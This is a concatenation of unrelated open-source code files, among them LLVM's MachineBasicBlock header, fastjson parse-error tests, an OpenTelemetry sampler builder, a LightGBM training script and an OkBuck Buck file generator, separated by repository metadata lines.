assert(!I->isBundled() && "Cannot remove bundled instructions");
return Insts.remove(instr_iterator(I));
}
/// Remove the possibly bundled instruction from the instruction list
/// without deleting it.
///
/// If the instruction is part of a bundle, the other instructions in the
/// bundle will still be bundled after removing the single instruction.
MachineInstr *remove_instr(MachineInstr *I);
void clear() {
Insts.clear();
}
/// Take an instruction from MBB 'Other' at the position From, and insert it
/// into this MBB right before 'Where'.
///
/// If From points to a bundle of instructions, the whole bundle is moved.
void splice(iterator Where, MachineBasicBlock *Other, iterator From) {
// The range splice() doesn't allow noop moves, but this one does.
if (Where != From)
splice(Where, Other, From, std::next(From));
}
/// Take a block of instructions from MBB 'Other' in the range [From, To),
/// and insert them into this MBB right before 'Where'.
///
/// The instruction at 'Where' must not be included in the range of
/// instructions to move.
void splice(iterator Where, MachineBasicBlock *Other,
iterator From, iterator To) {
Insts.splice(Where.getInstrIterator(), Other->Insts,
From.getInstrIterator(), To.getInstrIterator());
}
/// This method unlinks 'this' from the containing function, and returns it,
/// but does not delete it.
MachineBasicBlock *removeFromParent();
/// This method unlinks 'this' from the containing function and deletes it.
void eraseFromParent();
/// Given a machine basic block that branched to 'Old', change the code and
/// CFG so that it branches to 'New' instead.
void ReplaceUsesOfBlockWith(MachineBasicBlock *Old, MachineBasicBlock *New);
/// Various pieces of code can cause excess edges in the CFG to be inserted.
/// If we have proven that MBB can only branch to DestA and DestB, remove any
/// other MBB successors from the CFG. DestA and DestB can be null. Besides
/// DestA and DestB, retain other edges leading to LandingPads (currently
/// there can be only one; we don't check or require that here). Note it is
/// possible that DestA and/or DestB are LandingPads.
bool CorrectExtraCFGEdges(MachineBasicBlock *DestA,
MachineBasicBlock *DestB,
bool IsCond);
/// Find the next valid DebugLoc starting at MBBI, skipping any DBG_VALUE
/// and DBG_LABEL instructions. Return UnknownLoc if there is none.
DebugLoc findDebugLoc(instr_iterator MBBI);
DebugLoc findDebugLoc(iterator MBBI) {
return findDebugLoc(MBBI.getInstrIterator());
}
/// Find the previous valid DebugLoc preceding MBBI, skipping and DBG_VALUE
/// instructions. Return UnknownLoc if there is none.
DebugLoc findPrevDebugLoc(instr_iterator MBBI);
DebugLoc findPrevDebugLoc(iterator MBBI) {
return findPrevDebugLoc(MBBI.getInstrIterator());
}
/// Find and return the merged DebugLoc of the branch instructions of the
/// block. Return UnknownLoc if there is none.
DebugLoc findBranchDebugLoc();
/// Possible outcome of a register liveness query to computeRegisterLiveness()
enum LivenessQueryResult {
LQR_Live, ///< Register is known to be (at least partially) live.
LQR_Dead, ///< Register is known to be fully dead.
LQR_Unknown ///< Register liveness not decidable from local neighborhood.
};
/// Return whether (physical) register \p Reg has been defined and not
/// killed as of just before \p Before.
///
/// Search is localised to a neighborhood of \p Neighborhood instructions
/// before (searching for defs or kills) and \p Neighborhood instructions
/// after (searching just for defs) \p Before.
///
/// \p Reg must be a physical register.
LivenessQueryResult computeRegisterLiveness(const TargetRegisterInfo *TRI,
unsigned Reg,
const_iterator Before,
unsigned Neighborhood = 10) const;
// Debugging methods.
void dump() const;
void print(raw_ostream &OS, const SlotIndexes * = nullptr,
bool IsStandalone = true) const;
void print(raw_ostream &OS, ModuleSlotTracker &MST,
const SlotIndexes * = nullptr, bool IsStandalone = true) const;
// Printing method used by LoopInfo.
void printAsOperand(raw_ostream &OS, bool PrintType = true) const;
/// MachineBasicBlocks are uniquely numbered at the function level, unless
/// they're not in a MachineFunction yet, in which case this will return -1.
int getNumber() const { return Number; }
void setNumber(int N) { Number = N; }
/// Return the MCSymbol for this basic block.
MCSymbol *getSymbol() const;
Optional<uint64_t> getIrrLoopHeaderWeight() const {
return IrrLoopHeaderWeight;
}
void setIrrLoopHeaderWeight(uint64_t Weight) {
IrrLoopHeaderWeight = Weight;
}
private:
/// Return probability iterator corresponding to the I successor iterator.
probability_iterator getProbabilityIterator(succ_iterator I);
const_probability_iterator
getProbabilityIterator(const_succ_iterator I) const;
friend class MachineBranchProbabilityInfo;
friend class MIPrinter;
/// Return probability of the edge from this block to MBB. This method should
/// NOT be called directly, but by using getEdgeProbability method from
/// MachineBranchProbabilityInfo class.
BranchProbability getSuccProbability(const_succ_iterator Succ) const;
// Methods used to maintain doubly linked list of blocks...
friend struct ilist_callback_traits<MachineBasicBlock>;
// Machine-CFG mutators
/// Add Pred as a predecessor of this MachineBasicBlock. Don't do this
/// unless you know what you're doing, because it doesn't update Pred's
/// successors list. Use Pred->addSuccessor instead.
void addPredecessor(MachineBasicBlock *Pred);
/// Remove Pred as a predecessor of this MachineBasicBlock. Don't do this
/// unless you know what you're doing, because it doesn't update Pred's
/// successors list. Use Pred->removeSuccessor instead.
void removePredecessor(MachineBasicBlock *Pred);
};
raw_ostream& operator<<(raw_ostream &OS, const MachineBasicBlock &MBB);
/// Prints a machine basic block reference.
///
/// The format is:
/// %bb.5 - a machine basic block with MBB.getNumber() == 5.
///
/// Usage: OS << printMBBReference(MBB) << '\n';
Printable printMBBReference(const MachineBasicBlock &MBB);
// This is useful when building IndexedMaps keyed on basic block pointers.
struct MBB2NumberFunctor {
using argument_type = const MachineBasicBlock *;
unsigned operator()(const MachineBasicBlock *MBB) const {
return MBB->getNumber();
}
};
//===--------------------------------------------------------------------===//
// GraphTraits specializations for machine basic block graphs (machine-CFGs)
//===--------------------------------------------------------------------===//
// Provide specializations of GraphTraits to be able to treat a
// MachineFunction as a graph of MachineBasicBlocks.
//
template <> struct GraphTraits<MachineBasicBlock *> {
using NodeRef = MachineBasicBlock *;
using ChildIteratorType = MachineBasicBlock::succ_iterator;
static NodeRef getEntryNode(MachineBasicBlock *BB) { return BB; }
static ChildIteratorType child_begin(NodeRef N) { return N->succ_begin(); }
static ChildIteratorType child_end(NodeRef N) { return N->succ_end(); }
};
template <> struct GraphTraits<const MachineBasicBlock *> {
using NodeRef = const MachineBasicBlock *;
using ChildIteratorType = MachineBasicBlock::const_succ_iterator;
static NodeRef getEntryNode(const MachineBasicBlock *BB) { return BB; }
static ChildIteratorType child_begin(NodeRef N) { return N->succ_begin(); }
static ChildIteratorType child_end(NodeRef N) { return N->succ_end(); }
};
// Provide specializations of GraphTraits to be able to treat a
// MachineFunction as a graph of MachineBasicBlocks and to walk it
// in inverse order. Inverse order for a function is considered
// to be when traversing the predecessor edges of a MBB
// instead of the successor edges.
//
template <> struct GraphTraits<Inverse<MachineBasicBlock*>> {
using NodeRef = MachineBasicBlock *;
using ChildIteratorType = MachineBasicBlock::pred_iterator;
static NodeRef getEntryNode(Inverse<MachineBasicBlock *> G) {
return G.Graph;
}
static ChildIteratorType child_begin(NodeRef N) { return N->pred_begin(); }
static ChildIteratorType child_end(NodeRef N) { return N->pred_end(); }
};
template <> struct GraphTraits<Inverse<const MachineBasicBlock*>> {
using NodeRef = const MachineBasicBlock *;
using ChildIteratorType = MachineBasicBlock::const_pred_iterator;
static NodeRef getEntryNode(Inverse<const MachineBasicBlock *> G) {
return G.Graph;
}
static ChildIteratorType child_begin(NodeRef N) { return N->pred_begin(); }
static ChildIteratorType child_end(NodeRef N) { return N->pred_end(); }
};
/// MachineInstrSpan provides an interface to get an iteration range
/// containing the instruction it was initialized with, along with all
/// those instructions inserted prior to or following that instruction
/// at some point after the MachineInstrSpan is constructed.
class MachineInstrSpan {
MachineBasicBlock &MBB;
MachineBasicBlock::iterator I, B, E;
public:
MachineInstrSpan(MachineBasicBlock::iterator I)
: MBB(*I->getParent()),
I(I),
B(I == MBB.begin() ? MBB.end() : std::prev(I)),
E(std::next(I)) {}
MachineBasicBlock::iterator begin() {
return B == MBB.end() ? MBB.begin() : std::next(B);
}
MachineBasicBlock::iterator end() { return E; }
bool empty() { return begin() == end(); }
MachineBasicBlock::iterator getInitial() { return I; }
};
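// A hedged usage sketch: capture whatever gets inserted around an instruction
// during lowering (the code in the middle stands for whatever the caller does).
//
//   MachineInstrSpan MIS(I);
//   // ... insert new MachineInstrs before or after I ...
//   for (MachineInstr &MI : make_range(MIS.begin(), MIS.end())) {
//     // visits the original instruction plus everything just inserted
//   }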
/// Increment \p It until it points to a non-debug instruction or to \p End
/// and return the resulting iterator. This function should only be used
/// MachineBasicBlock::{iterator, const_iterator, instr_iterator,
/// const_instr_iterator} and the respective reverse iterators.
template<typename IterT>
inline IterT skipDebugInstructionsForward(IterT It, IterT End) {
while (It != End && It->isDebugInstr())
It++;
return It;
}
/// Decrement \p It until it points to a non-debug instruction or to \p Begin
/// and return the resulting iterator. This function should only be used
/// MachineBasicBlock::{iterator, const_iterator, instr_iterator,
/// const_instr_iterator} and the respective reverse iterators.
template<class IterT>
inline IterT skipDebugInstructionsBackward(IterT It, IterT Begin) {
while (It != Begin && It->isDebugInstr())
It--;
return It;
}
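// A brief usage sketch (illustrative): find the first non-debug instruction.
//
//   MachineBasicBlock::iterator I =
//       skipDebugInstructionsForward(MBB.begin(), MBB.end());
//   if (I != MBB.end()) {
//     // *I is the first instruction in MBB that is not a debug instruction.
//   }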
} // end namespace llvm
#endif // LLVM_CODEGEN_MACHINEBASICBLOCK_H
| 12,129 |
28,056 | <reponame>Czarek93/fastjson<filename>src/test/java/com/alibaba/json/bvt/parser/error/ParseErrorTest_21.java
package com.alibaba.json.bvt.parser.error;
import java.util.Map;
import org.junit.Assert;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONException;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;
import junit.framework.TestCase;
public class ParseErrorTest_21 extends TestCase {
public void test_for_error() throws Exception {
Exception error = null;
try {
JSON.parseObject("{\"value\":123}", Model.class);
} catch (JSONException ex) {
error = ex;
}
Assert.assertNotNull(error);
}
public void test_for_error_1() throws Exception {
Exception error = null;
try {
JSON.parseObject("{\"value\":{,,,\"id\",}}", Model.class);
} catch (JSONException ex) {
error = ex;
}
Assert.assertNotNull(error);
}
public void test_for_error_2() throws Exception {
Exception error = null;
try {
JSON.parseObject("{\"value\":{'child1':{\"id\":123}}}", Model.class, ParserConfig.getGlobalInstance(), 0);
} catch (JSONException ex) {
error = ex;
}
Assert.assertNotNull(error);
}
public void test_for_error_3() throws Exception {
Exception error = null;
try {
JSON.parseObject("{\"value\":{'child1',{\"id\":123}}}", Model.class);
} catch (JSONException ex) {
error = ex;
}
Assert.assertNotNull(error);
}
public void test_for_error_4() throws Exception {
Exception error = null;
try {
JSON.parseObject("{\"value\":{child1:{\"id\":123}}}", Model.class, ParserConfig.getGlobalInstance(), 0);
} catch (JSONException ex) {
error = ex;
}
Assert.assertNotNull(error);
}
public void test_for_error_5() throws Exception {
Exception error = null;
try {
JSON.parseObject("{\"value\":{child1,{\"id\":123}}}", Model.class, ParserConfig.getGlobalInstance(), 0, Feature.AllowUnQuotedFieldNames);
} catch (JSONException ex) {
error = ex;
}
Assert.assertNotNull(error);
}
public static class Model {
public Map<String, Child> value;
}
public static class Child {
public int id;
}
}
| 1,134 |
3,083 | /*
Copyright 2014 Google Inc. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package com.google.security.zynamics.binnavi.API.disassembly;
import java.util.List;
import com.google.security.zynamics.binnavi.API.disassembly.GroupNode;
import com.google.security.zynamics.binnavi.API.disassembly.IGroupNodeListener;
import com.google.security.zynamics.binnavi.API.disassembly.ViewNode;
import com.google.security.zynamics.binnavi.Gui.GraphWindows.CommentDialogs.Interfaces.IComment;
public final class MockGroupNodeListener implements IGroupNodeListener {
public String events = "";
@Override
public void addedNode(final GroupNode groupNode, final ViewNode node) {
events += "addedElement;";
}
@Override
public void appendedComment(final GroupNode groupNode, final IComment comment) {
events += "appendedComment;";
}
@Override
public void changedState(final GroupNode groupNode, final boolean collapsed) {
events += "changedState;";
}
@Override
public void deletedComment(final GroupNode groupNode, final IComment comment) {
events += "deletedComment;";
}
@Override
public void editedComment(final GroupNode groupNode, final IComment comment) {
events += "editedComment;";
}
@Override
public void initializedComment(final GroupNode groupNode, final List<IComment> comment) {
events += "initializedComment;";
}
@Override
public void removedNode(final GroupNode groupNode, final ViewNode node) {
events += "removedElement;";
}
}
| 576 |
499 | <gh_stars>100-1000
import warnings
import lightgbm as lgb
import pandas as pd
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import KFold
warnings.filterwarnings('ignore')
import time
from autox.autox_server.util import log
from autox.autox_server.model import model_util
SAMPLE_LIMIT = model_util.SAMPLE_LIMIT
def simple_lgb(G_df_dict, G_data_info, G_hist, is_train, remain_time, loop_num = None):
"""
"""
log('[+] simple lightgbm')
time_budget = G_data_info['time_budget']
Id = G_data_info['target_id']
target = G_data_info['target_label']
main_table_name = G_data_info['target_entity']
if is_train:
start = time.time()
G_hist['simple_lgb'] = {}
        # determine used_size; the amount of training data grows step by step
data_size = G_df_dict['BIG'].shape[0]
half_size = data_size // 2
        # todo: tune the size of the training dataset
used_size = [2 ** i * 1000 for i in range(12)]
used_size = [x for x in used_size if x < half_size]
used_size.extend([half_size, data_size])
if loop_num in range(0, 3):
try:
used_size = [used_size[loop_num]]
except:
used_size = [half_size]
elif loop_num == 3:
used_size = [half_size]
end = time.time()
remain_time -= (end - start)
log("remain_time: {} s".format(remain_time))
G_hist['simple_lgb']['simple_lgb_models'] = []
G_hist['simple_lgb']['AUCs'] = []
G_hist['simple_lgb']['used_features'] = []
G_hist['simple_lgb']['feature_importances'] = []
for rum_num in range(len(used_size)):
start = time.time()
train = G_df_dict['BIG'].sample(used_size[rum_num])
# 如果数据集超过一定的数量,采用采样的方式
if train.shape[0] >= SAMPLE_LIMIT:
train = train.sample(SAMPLE_LIMIT)
log("used size: {}".format(train.shape[0]))
not_used = Id + [target, 'istrain']
used_features = [x for x in list(train.describe().columns) if x not in not_used]
G_hist['simple_lgb']['used_features'].append(used_features)
            # keep track of feature importances
feature_importances = pd.DataFrame()
feature_importances['feature'] = train[used_features].columns
log("feature size: {}".format(train[used_features].shape[1]))
n_fold = 5
folds = KFold(n_splits=n_fold, shuffle=True, random_state=889)
quick = False
if quick:
lr = 0.1
Early_Stopping_Rounds = 150
N_round = 500
Verbose = 20
else:
lr = 0.006883242363721497
Early_Stopping_Rounds = 300
N_round = 2000
Verbose = 50
            params = {'num_leaves': 41,  # current baseline: 61
'min_child_weight': 0.03454472573214212,
'feature_fraction': 0.3797454081646243,
'bagging_fraction': 0.4181193142567742,
                      'min_data_in_leaf': 96,  # current baseline: 106
'objective': 'binary',
'max_depth': -1,
                      'learning_rate': lr,  # for quick validation
"boosting_type": "gbdt",
"bagging_seed": 11,
"metric": 'auc',
"verbosity": -1,
'reg_alpha': 0.3899927210061127,
'reg_lambda': 0.6485237330340494,
'random_state': 47,
'num_threads': 16
# 'is_unbalance':True
}
for fold_n, (train_index, valid_index) in enumerate(folds.split(train[used_features])):
if fold_n != 0:
break
# log('Training on fold {}'.format(fold_n + 1))
trn_data = lgb.Dataset(train[used_features].iloc[train_index], label=train[target].iloc[train_index],
categorical_feature="")
val_data = lgb.Dataset(train[used_features].iloc[valid_index], label=train[target].iloc[valid_index],
categorical_feature="")
clf = lgb.train(params, trn_data, num_boost_round=N_round, valid_sets=[trn_data, val_data],
verbose_eval=Verbose,
early_stopping_rounds=Early_Stopping_Rounds) # , feval=evalerror
val = clf.predict(train[used_features].iloc[valid_index])
                # For imbalanced data, the validation labels may all belong to one class
                if train[target].iloc[valid_index].nunique() == 1:
                    log("only one class of label in valid data. set auc = 0")
auc_score = 0.0
else:
auc_score = roc_auc_score(train[target].iloc[valid_index], val)
log('AUC: {}'.format(auc_score))
G_hist['simple_lgb']['AUCs'].append(auc_score)
G_hist['simple_lgb']['simple_lgb_models'].append(clf)
end = time.time()
remain_time -= (end - start)
log("time consumption: {}".format(str(end - start)))
log("remain_time: {} s".format(remain_time))
log("#" * 50)
feature_importances['average'] = clf.feature_importance()
feature_importances = feature_importances.sort_values(by="average", ascending=False)
G_hist['simple_lgb']['feature_importances'].append(feature_importances)
else:
start = time.time()
Id = G_data_info['target_id']
target = G_data_info['target_label']
test = G_df_dict['BIG']
test = test.loc[test['istrain'] == False]
sub = test[Id]
used_features = G_hist['simple_lgb']['used_features'][-1]
used_model = G_hist['simple_lgb']['simple_lgb_models'][-1]
sub[target] = used_model.predict(test[used_features])
G_hist['predict']['simple_lgb'] = sub
end = time.time()
remain_time -= (end - start)
log("remain_time: {} s".format(remain_time))
return remain_time
| 3,420 |
1,189 | <reponame>gcatanese/opentelemetry-java-tmp
/*
* Copyright The OpenTelemetry Authors
* SPDX-License-Identifier: Apache-2.0
*/
package io.opentelemetry.sdk.trace.samplers;
import javax.annotation.Nullable;
/** A builder for creating ParentBased sampler instances. */
public final class ParentBasedSamplerBuilder {
private final Sampler root;
@Nullable private Sampler remoteParentSampled;
@Nullable private Sampler remoteParentNotSampled;
@Nullable private Sampler localParentSampled;
@Nullable private Sampler localParentNotSampled;
ParentBasedSamplerBuilder(Sampler root) {
this.root = root;
}
/**
* Sets the {@link Sampler} to use when there is a remote parent that was sampled. If not set,
* defaults to always sampling if the remote parent was sampled.
*
* @return this Builder
*/
public ParentBasedSamplerBuilder setRemoteParentSampled(Sampler remoteParentSampled) {
this.remoteParentSampled = remoteParentSampled;
return this;
}
/**
* Sets the {@link Sampler} to use when there is a remote parent that was not sampled. If not set,
* defaults to never sampling when the remote parent isn't sampled.
*
* @return this Builder
*/
public ParentBasedSamplerBuilder setRemoteParentNotSampled(Sampler remoteParentNotSampled) {
this.remoteParentNotSampled = remoteParentNotSampled;
return this;
}
/**
* Sets the {@link Sampler} to use when there is a local parent that was sampled. If not set,
* defaults to always sampling if the local parent was sampled.
*
* @return this Builder
*/
public ParentBasedSamplerBuilder setLocalParentSampled(Sampler localParentSampled) {
this.localParentSampled = localParentSampled;
return this;
}
/**
* Sets the {@link Sampler} to use when there is a local parent that was not sampled. If not set,
* defaults to never sampling when the local parent isn't sampled.
*
* @return this Builder
*/
public ParentBasedSamplerBuilder setLocalParentNotSampled(Sampler localParentNotSampled) {
this.localParentNotSampled = localParentNotSampled;
return this;
}
/**
* Builds the {@link ParentBasedSampler}.
*
* @return the ParentBased sampler.
*/
public Sampler build() {
return new ParentBasedSampler(
this.root,
this.remoteParentSampled,
this.remoteParentNotSampled,
this.localParentSampled,
this.localParentNotSampled);
}
}
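
A minimal usage sketch, not part of the original file: it assumes the builder is obtained through Sampler.parentBasedBuilder(...) and that the Sampler factory methods alwaysOn(), alwaysOff() and traceIdRatioBased(double) exist in this SDK package; adjust if the actual API differs.

package io.opentelemetry.sdk.trace.samplers;

final class ParentBasedSamplerBuilderExample {
  private ParentBasedSamplerBuilderExample() {}

  static Sampler buildExampleSampler() {
    // The root sampler decides for spans without a parent; the overrides below
    // control the decision when a remote parent is present.
    return Sampler.parentBasedBuilder(Sampler.traceIdRatioBased(0.25))
        .setRemoteParentSampled(Sampler.alwaysOn())
        .setRemoteParentNotSampled(Sampler.alwaysOff())
        .build();
  }
}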
| 778 |
322 | <gh_stars>100-1000
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
* <p/>
* http://www.apache.org/licenses/LICENSE-2.0
* <p/>
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.eagle.app.module;
import com.typesafe.config.ConfigFactory;
import org.apache.eagle.app.service.ApplicationHealthCheckService;
import org.apache.eagle.app.service.ApplicationManagementService;
import org.apache.eagle.app.service.ApplicationProviderService;
import org.apache.eagle.app.service.impl.ApplicationHealthCheckServiceImpl;
import org.apache.eagle.app.service.impl.ApplicationManagementServiceImpl;
import org.apache.eagle.app.service.impl.ApplicationProviderServiceImpl;
import org.apache.eagle.app.service.impl.ApplicationStatusUpdateServiceImpl;
import org.apache.eagle.metadata.service.ApplicationDescService;
import com.google.inject.AbstractModule;
import com.google.inject.Singleton;
import com.google.inject.util.Providers;
import org.apache.eagle.metadata.service.ApplicationStatusUpdateService;
public class ApplicationGuiceModule extends AbstractModule {
private final ApplicationProviderService appProviderInst;
public ApplicationGuiceModule(ApplicationProviderService appProviderInst) {
this.appProviderInst = appProviderInst;
}
public ApplicationGuiceModule() {
this.appProviderInst = new ApplicationProviderServiceImpl(ConfigFactory.load());
}
@Override
protected void configure() {
bind(ApplicationProviderService.class).toProvider(Providers.of(appProviderInst));
bind(ApplicationDescService.class).toProvider(Providers.of(appProviderInst));
bind(ApplicationManagementService.class).to(ApplicationManagementServiceImpl.class).in(Singleton.class);
bind(ApplicationStatusUpdateService.class).to(ApplicationStatusUpdateServiceImpl.class).in(Singleton.class);
bind(ApplicationHealthCheckService.class).to(ApplicationHealthCheckServiceImpl.class).in(Singleton.class);
}
} | 720 |
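
A hedged bootstrap sketch, not from the Eagle repository: it only exercises the bindings declared above through a standard Guice injector. The provider-backed bindings resolved here need no extra configuration; the singleton-scoped service bindings may require additional Eagle modules in a real deployment.

import com.google.inject.Guice;
import com.google.inject.Injector;
import org.apache.eagle.app.module.ApplicationGuiceModule;
import org.apache.eagle.app.service.ApplicationProviderService;
import org.apache.eagle.metadata.service.ApplicationDescService;

public class ApplicationGuiceModuleExample {
    public static void main(String[] args) {
        // The no-arg constructor loads configuration through ConfigFactory.load().
        Injector injector = Guice.createInjector(new ApplicationGuiceModule());

        // Both interfaces are bound to the same provider instance via Providers.of(...).
        ApplicationProviderService providerService =
                injector.getInstance(ApplicationProviderService.class);
        ApplicationDescService descService =
                injector.getInstance(ApplicationDescService.class);

        System.out.println("providerService = " + providerService);
        System.out.println("descService = " + descService);
    }
}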
3,246 | package com.polidea.rxandroidble2.internal;
/**
 * The class representing the priority with which a {@link QueueOperation} should be executed.
 * Used when overriding definedPriority().
*/
public class Priority {
public static final Priority HIGH = new Priority(100);
public static final Priority NORMAL = new Priority(50);
public static final Priority LOW = new Priority(0);
final int priority;
private Priority(int priority) {
this.priority = priority;
}
}
| 142 |
515 | <gh_stars>100-1000
/*=============================================================================
Library: CTK
Copyright (c) German Cancer Research Center,
Division of Medical and Biological Informatics
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=============================================================================*/
#ifndef CTKPLUGINBROWSER_H
#define CTKPLUGINBROWSER_H
#include <QMainWindow>
#include <ui_ctkPluginBrowserMainWindow.h>
#include "ctkPluginBrowserEditors.h"
#include <ctkPluginEvent.h>
#include <ctkPluginFrameworkEvent.h>
#include <ctkPlugin.h>
#include <ctkServiceEvent.h>
class ctkPluginFramework;
class ctkPluginBrowser : public QMainWindow
{
Q_OBJECT
public:
ctkPluginBrowser(ctkPluginFramework* framework);
private Q_SLOTS:
void pluginSelected(const QModelIndex& index);
void pluginDoubleClicked(const QModelIndex& index);
void qtResourceDoubleClicked(const QModelIndex& index);
void dbResourceDoubleClicked(const QModelIndex& index);
void frameworkEvent(const ctkPluginFrameworkEvent& event);
void pluginEvent(const ctkPluginEvent& event);
void serviceEvent(const ctkServiceEvent& event);
void startPlugin();
void startPluginNow();
void stopPlugin();
private:
void closeEvent(QCloseEvent* closeEvent);
void updatePluginToolbar(QSharedPointer<ctkPlugin> plugin);
void startPlugin(ctkPlugin::StartOptions options);
QMap<ctkPluginEvent::Type, QString> pluginEventTypeToString;
ctkPluginFramework* framework;
Ui::ctkPluginBrowserWindow ui;
ctkPluginBrowserEditors* editors;
QAction* startPluginNowAction;
QAction* startPluginAction;
QAction* stopPluginAction;
};
#endif // CTKPLUGINBROWSER_H
| 629 |
631 | #ifndef _PRIVATE_ERRORS_H_
#define _PRIVATE_ERRORS_H_
#define BP_OK 0
#define BP_EFILE 0x101
#define BP_EFILEREAD_OOB 0x102
#define BP_EFILEREAD 0x103
#define BP_EFILEWRITE 0x104
#define BP_EFILEFLUSH 0x105
#define BP_EFILERENAME 0x106
#define BP_ECOMPACT_EXISTS 0x107
#define BP_ECOMP 0x201
#define BP_EDECOMP 0x202
#define BP_EALLOC 0x301
#define BP_EMUTEX 0x302
#define BP_ERWLOCK 0x303
#define BP_ENOTFOUND 0x401
#define BP_ESPLITPAGE 0x402
#define BP_EEMPTYPAGE 0x403
#define BP_EUPDATECONFLICT 0x404
#define BP_EREMOVECONFLICT 0x405
#endif /* _PRIVATE_ERRORS_H_ */
| 375 |
4,140 | <reponame>FANsZL/hive<filename>serde/src/test/org/apache/hadoop/hive/serde2/columnar/TestBytesRefArrayWritable.java
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hive.serde2.columnar;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
public class TestBytesRefArrayWritable {
private final BytesRefArrayWritable left = new BytesRefArrayWritable(4);
private final BytesRefArrayWritable right = new BytesRefArrayWritable(4);
@Before
public void setup() throws Exception {
left.set(0, new BytesRefWritable("123".getBytes("UTF-8")));
left.set(1, new BytesRefWritable("456".getBytes("UTF-8")));
left.set(2, new BytesRefWritable("789".getBytes("UTF-8")));
left.set(3, new BytesRefWritable("1000".getBytes("UTF-8")));
right.set(0, new BytesRefWritable("123".getBytes("UTF-8")));
right.set(1, new BytesRefWritable("456".getBytes("UTF-8")));
right.set(2, new BytesRefWritable("289".getBytes("UTF-8")));
right.set(3, new BytesRefWritable("1000".getBytes("UTF-8")));
}
@Test // HIVE-5839
public void testCompareTo() {
int a = left.compareTo(right);
int b = right.compareTo(left);
Assert.assertEquals("a.compareTo(b) should be equal to -b.compareTo(a)", a, -b );
Assert.assertEquals("An object must be equal to itself", 0, left.compareTo(left));
}
}
| 703 |
1,090 | package com.uber.okbuck.generator;
import com.google.common.collect.Multimap;
import com.google.common.collect.TreeMultimap;
import com.uber.okbuck.composer.android.AndroidBinaryRuleComposer;
import com.uber.okbuck.composer.android.AndroidBuckRuleComposer;
import com.uber.okbuck.composer.android.AndroidBuildConfigRuleComposer;
import com.uber.okbuck.composer.android.AndroidInstrumentationApkRuleComposer;
import com.uber.okbuck.composer.android.AndroidInstrumentationTestRuleComposer;
import com.uber.okbuck.composer.android.AndroidModuleRuleComposer;
import com.uber.okbuck.composer.android.AndroidTestRuleComposer;
import com.uber.okbuck.composer.android.ExopackageAndroidLibraryRuleComposer;
import com.uber.okbuck.composer.android.GenAidlRuleComposer;
import com.uber.okbuck.composer.android.KeystoreRuleComposer;
import com.uber.okbuck.composer.android.ManifestRuleComposer;
import com.uber.okbuck.composer.android.PreBuiltNativeLibraryRuleComposer;
import com.uber.okbuck.composer.jvm.JvmIntegrationTestRuleComposer;
import com.uber.okbuck.composer.jvm.JvmLibraryRuleComposer;
import com.uber.okbuck.composer.jvm.JvmTestRuleComposer;
import com.uber.okbuck.core.manager.BuckFileManager;
import com.uber.okbuck.core.model.android.AndroidAppInstrumentationTarget;
import com.uber.okbuck.core.model.android.AndroidAppTarget;
import com.uber.okbuck.core.model.android.AndroidLibInstrumentationTarget;
import com.uber.okbuck.core.model.android.AndroidLibTarget;
import com.uber.okbuck.core.model.base.ProjectType;
import com.uber.okbuck.core.model.base.RuleType;
import com.uber.okbuck.core.model.jvm.JvmTarget;
import com.uber.okbuck.core.util.ProjectCache;
import com.uber.okbuck.core.util.ProjectUtil;
import com.uber.okbuck.extension.OkBuckExtension;
import com.uber.okbuck.extension.TestExtension;
import com.uber.okbuck.extension.VisibilityExtension;
import com.uber.okbuck.template.android.AndroidModuleRule;
import com.uber.okbuck.template.android.AndroidRule;
import com.uber.okbuck.template.core.Rule;
import java.io.File;
import java.util.ArrayList;
import java.util.LinkedHashSet;
import java.util.List;
import java.util.stream.Collectors;
import javax.annotation.Nullable;
import org.gradle.api.Project;
public final class BuckFileGenerator {
private BuckFileGenerator() {}
/** generate {@code BUCKFile} */
public static void generate(
Project project, BuckFileManager buckFileManager, OkBuckExtension okBuckExtension) {
VisibilityExtension visibilityExtension = okBuckExtension.getVisibilityExtension();
TestExtension testExtension = okBuckExtension.getTestExtension();
File moduleDir = project.getBuildFile().getParentFile();
File visibilityFile = new File(moduleDir, visibilityExtension.visibilityFileName);
boolean hasVisibilityFile = visibilityFile.isFile();
boolean integrationTestsEnabled = testExtension.enableIntegrationTests;
List<Rule> rules = createRules(project, integrationTestsEnabled);
Multimap<String, String> extraLoadStatements = TreeMultimap.create();
if (hasVisibilityFile) {
rules.forEach(rule -> rule.fileConfiguredVisibility(true));
extraLoadStatements.put(
":" + visibilityExtension.visibilityFileName, visibilityExtension.visibilityFunction);
}
File buckFile = project.file(okBuckExtension.buildFileName);
buckFileManager.writeToBuckFile(rules, buckFile, extraLoadStatements);
}
